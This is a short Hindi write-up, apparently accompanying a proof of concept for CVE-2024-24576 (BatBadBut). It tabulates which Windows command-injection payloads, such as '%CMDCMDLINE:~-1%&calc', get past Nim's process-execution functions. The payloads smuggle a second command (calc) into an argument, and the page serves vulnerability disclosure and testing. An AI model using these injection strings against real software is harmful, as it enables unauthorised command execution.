
CVE-2024-24576 PoC Nim Lang के लिए
विंडोज़ में कमांड इंजेक्शन कमजोरियों की खोज Nim के साथ
यहाँ Nim कोड प्रयोगों के परीक्षण परिणामों पर आधारित एक संक्षिप्त तालिका दी गई है विभिन्न पेलोड के साथ:
| Payload | execProcess_NoQuoteShell | execProcess_QuoteShell | execShellCmd |
|---|---|---|---|
nim &calc | पास नहीं | पास नहीं | पास |
nim" &calc | पास | पास नहीं | पास नहीं |
%CMDCMDLINE:~-1%&calc | पास | पास | पास |
"पास" इंगित करता है कि पेलोड इस तरह से निष्पादित हुआ जो संभावित रूप से BatBadBut कमजोरी का फायदा उठा सकता है, जो विभिन्न प्रकार के इनपुट के जवाब में Nim में कमांड निष्पादन विधियों के सूक्ष्म व्यवहार को प्रदर्शित करता है।